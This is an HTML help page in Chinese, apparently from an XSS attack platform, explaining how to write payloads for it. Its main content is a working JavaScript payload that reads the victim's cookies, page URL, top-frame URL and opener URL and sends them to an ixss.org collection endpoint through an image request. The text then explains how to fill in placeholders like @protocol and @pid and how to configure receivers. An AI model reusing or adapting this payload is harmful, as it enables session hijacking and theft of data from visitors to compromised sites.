<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>如何编写Payload</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-md-8 col-md-offset-2">
            <header class="page-header">
                <h2 class="h2 title">如何编写一个Payload</h2>
            </header>
            <section>
                <pre class="brush:js;toolbar:false">(function() { (new Image()).src = &#39;@protocol://ixss.org/p/r/@pid?location=&#39; + escape((function() {
        try {
            return document.location.href
        } catch(e) {
            return &#39;&#39;
        }
    })()) + &#39;&amp;toplocation=&#39; + escape((function() {
        try {
            return top.location.href
        } catch(e) {
            return &#39;&#39;
        }
    })()) + &#39;&amp;cookie=&#39; + escape((function() {
        try {
            return document.cookie
        } catch(e) {
            return &#39;&#39;
        }
    })()) + &#39;&amp;opener=&#39; + escape((function() {
        try {
            return (window.opener &amp;&amp; window.opener.location.href) ? window.opener.location.href: &#39;&#39;
        } catch(e) {
            return &#39;&#39;
        }
    })());
})();</pre>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp;首先来看这段代码（其实是抄的xsser。
                </p>
                <p>
                    &nbsp;&nbsp;&nbsp; @protocol, @pid等以@打头即为需要替换的参数，如@protocol就可以指定使用http或者https。
                </p>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp;在完成了一段payload之后，只需要在“编辑项目”功能中，在Configs文本框内输入指定的Json即可。
                </p>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp;例如：
                </p>
                <pre class="brush:js;toolbar:false">{&quot;@protocol&quot;:&quot;http&quot;}</pre>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;另外需要注意的是，@pid是当前项目的id号，如果只是想alert一下，不设置也可以（不过应该不会这么无聊吧
                </p>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp; 还有一点需要注意的是，如果需要在获取xss结果的过程中，需要使用新的参数，那么可以在payload编辑或创建时设置Receiver。
                </p>
                <p>
                    &nbsp;&nbsp;&nbsp;&nbsp; 以Get或者Post方式传入均可<br/>
                </p>
            </section>
            </div>
        </div>
    </div>
</body>
</html>